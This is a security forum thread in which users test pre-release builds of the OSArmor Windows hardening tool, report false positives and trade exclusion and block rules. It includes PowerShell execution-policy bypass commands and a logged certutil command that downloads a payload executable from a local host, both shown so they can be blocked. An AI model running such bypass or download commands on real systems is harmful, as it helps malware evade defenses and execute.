NoVirusThanks OSArmor: An Additional Layer of Defense

Discussion in 'other anti-malware software' started by novirusthanks, Dec 17, 2017.

  1. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,067
    Location:
    Italy
    @bjm_

    Thanks for sharing.

    @siketa

    Yes, still a few small things to check and it should be ready.

    @Sampei Nihira

    Should be fine.

    @plat1098

    Unfortunately the exes are not signed.

    However, try this exclusion rule (safer because we check also command-line):

    Code:
    [%PROCESS%: C:\Users\Public\Documents\Winstep\Versions\setup.exe] [%PARENTPROCESS%: C:\Users\*\AppData\Local\Temp\is-?????.tmp\setup.tmp] [%PROCESSCMDLINE%: "C:\Users\Public\Documents\Winstep\Versions\setup.exe" /SPAWNWND=* /NOTIFYWND=* /SP /SILENT]
    
    Or just:

    Code:
    [%PROCESS%: C:\Users\Public\Documents\Winstep\Versions\setup.exe] [%PARENTPROCESS%: C:\Users\*\AppData\Local\Temp\is-?????.tmp\setup.tmp]
    
     
  2. plat1098

    plat1098 Guest

    Thank you for helpful replies, @mood, @novirusthanks! I add the first exclusion rule from novirusthanks in post 1426 and see how it goes. :)
     
  3. chrcol

    chrcol Registered Member

    Joined:
    Apr 19, 2006
    Posts:
    927
    Location:
    UK
    this looks very promising, now I hope there is no noticeable lag when installed, will install on my test system and test away. :)

    A request if its not already implemented, can these known powershell script restriction bypasses be blocked by osarmour?

    Code:
    Run the script in PowerShell_ISE by selecting all of the code and pressing F8
    PowerShell.exe -ExecutionPolicy Bypass -File c:\temp\PowerShellScript.ps1
    PowerShell.exe -ExecutionPolicy UNRestricted -File c:\temp\PowerShellScript.ps1
    Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
    Also does anyone run this alongside HMPA with no issues?
     
  4. stapp

    stapp Global Moderator

    Joined:
    Jan 12, 2006
    Posts:
    15,302
    Location:
    UK
    Installed on Win 10 now and so far I hardly even notice it's there.
     
  5. shadek

    shadek Registered Member

    Joined:
    Feb 26, 2008
    Posts:
    2,538
    Location:
    Sweden
    With the latest build I am getting an error when accessing the "main protection" and "advanced" tab i settings. It's always the same address and same module. Different "Read of adress" every time.

    upload_2018-4-2_17-9-33.png
    upload_2018-4-2_17-10-25.png
    upload_2018-4-2_17-10-53.png
     
    Last edited: Apr 2, 2018
  6. loungehake

    loungehake Registered Member

    Joined:
    Mar 9, 2015
    Posts:
    170
    Location:
    Wigan
    I wish that OSArmor did not cause both my Windows 7 (64bit) systems to hang. Since the first test version of 1.4 this situation has prevailed. By comparison, my Windows XP systems have been entirely free of such problems right through to test version 46. There must be some underlying bug which awaits discovery.
     
  7. guest

    guest Guest

    @shadek, do you use an anti-exploit (or used the one in Win10 with some personal settings) or some other security Apps?

    If yes, what if you disable all of them, still have the error?
     
  8. shadek

    shadek Registered Member

    Joined:
    Feb 26, 2008
    Posts:
    2,538
    Location:
    Sweden
    I only use Windows Defender and OSA. I tried disabling all of Windows 10s native anti-exploit mechanisms but that didn't help. I'll try and re-install.

    Edit: Re-installing did not work.
     
    Last edited: Apr 2, 2018
  9. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,067
    Location:
    Italy
    Here is a new v1.4 (pre-release) test47:
    http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test47.exe

    *** Please do not share the download link, we will delete it when we'll release the official v1.4 ***

    So far this is what's new compared to the previous pre-release:

    To install it, first uninstall the previous build, then reboot (not really needed but may help), and install the new build.

    Here is a screenshot:

    osa47.png

    Question:

    Are you guys having alerts\FPs with the option "Block suspicious processes" (build 47)?

    Please let me know in case.

    @chrcol

    You can create custom rules to block anything you want.

    OSA can block 2 and 3 with pre-configured rules, about 4 I can add a rule for that on the next build, or you can add this on CustomBlock.db:

    Code:
    [%PROCESS%: *\powershell.exe] [%PROCESSCMDLINE%: *-ExecutionPolicy *UnRestricted*]
    
    Have not tested 1 yet.

    Should work fine, I recall there are a few users that use both OSA and HMPA together.

    @shadek

    Really strange, I have OSA running on 5 machines here (not VMs) and Configurator works fine.

    I suspect, as @guest said, that there is a conflict with a WDEG rule probably.

    Can you try this new build 47?

    @loungehake

    No hangs here (W7 Pro and W10 Pro), will try to reproduce.
     
    Last edited: Apr 2, 2018
  10. bjm_

    bjm_ Registered Member

    Joined:
    May 22, 2009
    Posts:
    3,588
    Location:
    .
    Date/Time: 4/3/2018 4:06:49 PM
    Process: [10272]C:\Windows\System32\makecab.exe
    Parent: [10612]C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.994_none_9e3edae32dc31172\TiWorker.exe
    Rule: BlockMakecabExecution
    Rule Name: Block execution of makecab.exe
    Command Line: "C:\WINDOWS\system32\makecab.exe" C:\WINDOWS\Logs\CBS\CbsPersist_20180328174047.log C:\WINDOWS\Logs\CBS\CbsPersist_20180328174047.cab
    Signer:
    Parent Signer:
    User/Domain: SYSTEM/NT AUTHORITY
    Integrity Level: System
    2614.png
    (test47 all rules checked)
     
  11. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,067
    Location:
    Italy
    Here is a new v1.4 (pre-release) test48:
    http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test48.exe

    *** Please do not share the download link, we will delete it when we'll release the official v1.4 ***

    So far this is what's new compared to the previous pre-release:

    + Fixed a typo on Exclusions.db and CustomBlock.db
    + New option: Block "ExecutionPolicy Unrestricted" on command-line (PowerShell)
    + Improved Prevent regsvr32.exe from loading .sct files
    + Improved Prevent rundll32.exe from using Control_RunDLL (shell32.dll)
    + Improved Block loading of .inf files via advpack.dll,LaunchINFSection
    + Improved Block "ExecutionPolicy Bypass" on command-line (PowerShell)
    + Improved Block suspicious command-lines
    + Improved Block suspicious Svchost.exe process behaviors
    + Minor fixes and optimizations
    + Fixed some false positives

    To install it, first uninstall the previous build, then reboot (not really needed but may help), and install the new build.

    @bjm_

    FP fixed on build 48.
     
  12. digmor crusher

    digmor crusher Registered Member

    Joined:
    Jul 6, 2012
    Posts:
    751
    Location:
    Canada
    Test 48 running well here along side EAM. New builds are coming so fast that I usually just install every second build. No reboot needed.
     
  13. Trooper

    Trooper Registered Member

    Joined:
    Jan 26, 2005
    Posts:
    4,479
    Just updated to the latest build. Thanks as always!
     
  14. Djigi

    Djigi Registered Member

    Joined:
    Aug 13, 2012
    Posts:
    554
    Location:
    Croatia
    In Win 10 v1803 everything looks good (and SysHardener also)

    Clipboard01.jpg

    Can you add (at Advanced Tab) options for select all/Suggested Tweaks (see picture)?

    Clipboard04.jpg
     
  15. loungehake

    loungehake Registered Member

    Joined:
    Mar 9, 2015
    Posts:
    170
    Location:
    Wigan
    Do you have any tools or instructions for users to use to provide the developer with system information to help identify problems?
     
  16. guest

    guest Guest

    +1
     
  17. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    8,737
    Location:
    U.S.A. (South)
    On Windows 10 1803 this release is working to expectations. Still exploring and testing fields.
     
  18. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    8,153
    Location:
    Among the gum trees
    Hi @novirusthanks ,

    I just got this probable false positive when opening Chrome.
    Code:
    Date/Time: 5/04/2018 8:52:43 AM
    Process: [10132]C:\Windows\System32\cmd.exe
    Parent: [2848]C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    Rule: BlockSuspiciousCmdlines
    Rule Name: Block execution of suspicious command-line strings
    Command Line: C:\WINDOWS\system32\cmd.exe /d /c "C:\Program Files\Norton Security\Engine\22.12.1.15\coNatHst.exe" chrome-extension://cjabmdjcfcfdmffimndhafhblfmpjdpe/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.250e2ef050df31bb > \\.\pipe\chrome.nativeMessaging.out.250e2ef050df31bb
    Signer:
    Parent Signer: Google Inc
    User/Domain: David/DAVID-HP
    Integrity Level: Medium
     
    Thanks.

    Edit: I have added it as an exclusion twice already but it gets blocked every time I open Chrome. I am sure it is related to the Norton Security Toolbar extension.

    Edit 2: This exclusion worked.

    Note the two "*" wildcards required.
     
    Last edited: Apr 4, 2018
  19. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    34,744
    ("C:\Program Files\Norton Security\Engine\22.12.1.15\coNatHst.exe")
    The version number might change sooner or later. To mitigate this it can be exchanged with a "*" too.
     
  20. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    8,153
    Location:
    Among the gum trees
    Great catch! Thanks as always, mood. :thumb:
     
  21. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    34,744
  22. Azure Phoenix

    Azure Phoenix Registered Member

    Joined:
    Nov 22, 2014
    Posts:
    1,235
    I got a fp similar to Krusty's. But mine involved Eagleget

    Date/Time: 4/4/2018 8:41:48 PM
    Process: [5184]C:\Windows\System32\cmd.exe
    Parent: [9500]C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    Rule: BlockSuspiciousCmdlines
    Rule Name: Block execution of suspicious command-line strings
    Command Line: C:\WINDOWS\system32\cmd.exe /d /c "C:\Program Files (x86)\EagleGet\EGMonitor.exe" chrome-extension://kaebhgioafceeldhgjmendlfhbfjefmo/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.b20bf05ca9fc03d3 > \\.\pipe\chrome.nativeMessaging.out.b20bf05ca9fc03d3
    Signer:
    Parent Signer: Google Inc
    Integrity Level: Medium
     
  23. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    1,777
    Location:
    Italy
    Better enter a rule for Certutil.exe:

    https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/

    https://isc.sans.edu/diary/rss/23517
     
    Last edited: Apr 5, 2018
  24. jimb949

    jimb949 Registered Member

    Joined:
    Jul 6, 2017
    Posts:
    129
    Location:
    LA
    FP:
    Date/Time: 4/5/2018 9:04:36 AM
    Process: [4664]C:\Windows\System32\cmd.exe
    Parent: [1508]C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    Rule: BlockSuspiciousCmdlines
    Rule Name: Block execution of suspicious command-line strings
    Command Line: C:\windows\system32\cmd.exe /d /c "C:\Program Files (x86)\Siber Systems\AI RoboForm\Chrome\rf-chrome-nm-host.exe" chrome-extension://pnlccmojcmeohlpggmfnbbiapkmbliob/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.7570cb3ded711f33 > \\.\pipe\chrome.nativeMessaging.out.7570cb3ded711f33
    Signer:
    Parent Signer: Google Inc
    User/Domain: Jim/Jim-PC
    Integrity Level: Medium

    I'm using test 48 and have excluded this FP but everytime I open chrome I still get a popup for it.
     
  25. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,067
    Location:
    Italy
    Here is a new v1.4 (pre-release) test49:
    http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test49.exe

    / /Edit: Link fixed

    *** Please do not share the download link, we will delete it when we'll release the official v1.4 ***

    So far this is what's new compared to the previous pre-release:

    + Improved Block execution of .wsf scripts
    + Improved Block suspicious command-lines
    + Disabled /silent and /verysilent uninstallation
    + Improved Prevent important Windows services from being disabled
    + Fixed some false positives

    To install it, first uninstall the previous build, then reboot (not really needed but may help), and install the new build.

    All reported FPs should be fixed.

    @Sampei Nihira

    Rule was added a few builds ago:

    Code:
    Date/Time: 06/04/2018 00:50:53
    Process: [6084]C:\Windows\System32\certutil.exe
    Parent: [6020]C:\Windows\System32\cmd.exe
    Rule: BlockSuspiciousCmdlines
    Rule Name: Block execution of suspicious command-line strings
    Command Line: certutil  -urlcache -split -f http://127.0.0.1:80/payload.exe
    Signer:
    Parent Signer:
    
    :thumb:
     
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.